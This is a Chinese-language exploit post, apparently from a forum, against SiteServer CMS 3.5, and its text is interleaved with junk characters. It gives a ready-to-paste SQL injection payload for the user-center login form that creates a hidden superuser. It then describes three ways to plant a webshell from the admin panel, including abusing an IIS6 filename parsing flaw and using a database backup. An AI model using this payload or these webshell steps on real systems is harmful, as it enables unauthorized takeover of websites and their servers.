经测试秒杀最新的3.5版
2 R2 J6 U; H9 w O, `2 L6 I8 }+ N0 r _, j
stieserver官网:www.siteserver.cn
/ d, B4 x1 Q4 r T; w
/ x! I5 u% p7 U$ u 5 H+ ]; @* C- Y2 e
# j0 i$ U& t7 E# ~9 h" c8 F! }
EXP:
' |* R: C' h0 i
s( q4 J7 d5 E) f. M7 R5 V直接访问UserCenter/login.aspx" \ |! B _+ `; |8 V) r5 B* ^
( Q- |: {6 o0 s $ d/ U, K& t6 r0 |/ X
8 g' f, L5 a! X8 C5 u! e
用户名处输入:4 A( t$ d- e! E$ t( \& {% {
4 K$ H! I; O" b/ ~: w% U123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--1 }- n" _9 _+ w& t, ^' G* C+ B
! n3 q- P+ y3 M0 @% {3 S6 j { p& b* |- U& u. c( @3 Z
* ?+ a1 y: J/ f' [密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
; {3 ~; f H8 w' P) X5 D4 i# `& x
9 j1 A4 B5 H1 P5 I) |
/ ^! b7 ^4 {- x! F4 R之后再访问后台SiteServer/login.aspx用插入的用户登陆
5 j6 u8 B2 Q) y7 i; l3 Y: y8 y n$ G
/ w, Y' N7 Z* m* K
. j/ N% {6 s T) A# k' \, L
9 w! j' p+ l- o8 r后台拿webshell的三种方法:
: R* e* l2 ]; x* [7 c1 }6 r- X, O+ `# n8 G! Q& j
一、
, S- p1 G3 o8 P% O0 f( a! k+ B r& ]- S8 d
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
J& Z7 i( q: c8 R& t# {# r1 s- e$ ]& y& B9 t5 x
二、* h+ P$ Q: I2 a8 \+ q
1 N3 _) H2 g! X, i$ G, F$ |0 l) I
成员权限-》添加用户-》用户名为:1.asp
$ l+ M- h( J ]8 S T; ~
) w i) Q( P, T8 Lhttp://127.0.0.1/usercenter/# f. g5 G4 F& O
# _9 A) C F7 A
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell' B* f' f) m" _2 i% H! J
/ C1 O* i% A* ?! D) M(ps:后台添加用户时不会验证是否含有非法字符)
0 G$ X, ]: v. C# B2 ]
" n B" I, K/ x4 x三、
. _ k/ M q: @1 Y
: y9 }- ]3 A; }9 S$ b系统工具-》实用工具-》机器参数查看
% L0 D) M0 X3 R; A% z* n可以看到数据库类型、名称,WEB路径3 S, ~5 a2 n1 o/ m& }3 Q! L0 r, E+ U
; _. O# f( P4 R" r% u4 h
系统工具-》数据库工具-》SQL语句查询. [- t# K& M/ X6 X8 r
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。. |" {0 f. D8 }4 z C# F
4 b( r7 s$ D' u' B5 s& z. Y1 q7 m
|